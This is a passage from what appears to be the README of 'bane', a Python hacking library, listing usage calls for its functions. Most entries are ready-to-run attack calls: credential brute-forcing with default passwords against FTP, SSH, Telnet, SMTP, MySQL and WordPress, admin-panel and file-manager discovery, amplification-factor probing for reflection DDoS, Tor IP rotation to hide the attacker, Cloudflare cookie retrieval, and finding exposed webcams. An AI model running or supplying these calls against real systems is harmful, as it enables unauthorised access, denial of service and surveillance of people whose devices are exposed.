bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )

SSH server: (if you are on Windows, please install PuTTY)

bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )

TELNET server:

bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )

SMTP server:

bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)

MySQL server:

bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )

WordPress login page:

bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )

Admin panel finder:

bane.admin_panel_finder(link , ext="php" , timeout=15 )

Force browsing pages on admin panel:

bane.force_browsing(link , ext="php" , timeout=15 )

Filemanager finder:

bane.filemanager_finder(link , ext="php" , timeout=15 )

Amplification factors calculation for some protocols:

DNS:

bane.dns_factor( IP , timeout=3 )

NTP:

bane.ntp_factor( IP , timeout=3 )

Memcache:

bane.memcache_factor( IP , timeout=3 )

Chargen:

bane.chargen_factor( IP , timeout=3 )

SSDP:

bane.ssdp_factor( IP , timeout=3 )

SNMP:

bane.snmp_factor( IP , timeout=3 )

ECHO:

bane.echo_factor( IP , timeout=3 )

Tor IP switching:

Without password: (doesn't work with Windows OS)

bane.tor_switch_no_password( interval=30 , logs=True )

With password: (doesn't work with Windows OS)

bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)

Updating bane:

bane.update(version=None)

Some extra useful functions:

Clear a file:

bane.clear_file( file )

Create a file:

bane.create_file( file )

Delete a file:

bane.delete_file( file )

Get content of a file:

bane.read_file( file )

Get Cloudflare cookie: (you must install Node.js first)

bane.get_cf_cookie( domain , user_agent )

Get HTB invitation:

bane.HTB_invitation()

Get Facebook account's ID:

bane.facebook_id( fb_link )

Google dorking:

bane.google_dorking( dork )

Webhint report's link:

bane.webhint_report( link )

YouTube search:

bane.youtube_search( query )

Write to a file:

bane.write_file( data , file )

Find webcams:

bane.webcams( count=10 , by={'country':'us'} )
bane.webcams( count=10 , by={'type':'axis'} )
bane.webcams( count=10 , by={'city':'paris'} )
bane.webcams( count=10 , by={'timezone':'+00:00'} )

About

License: MIT License


Languages

Language: Python 100.0%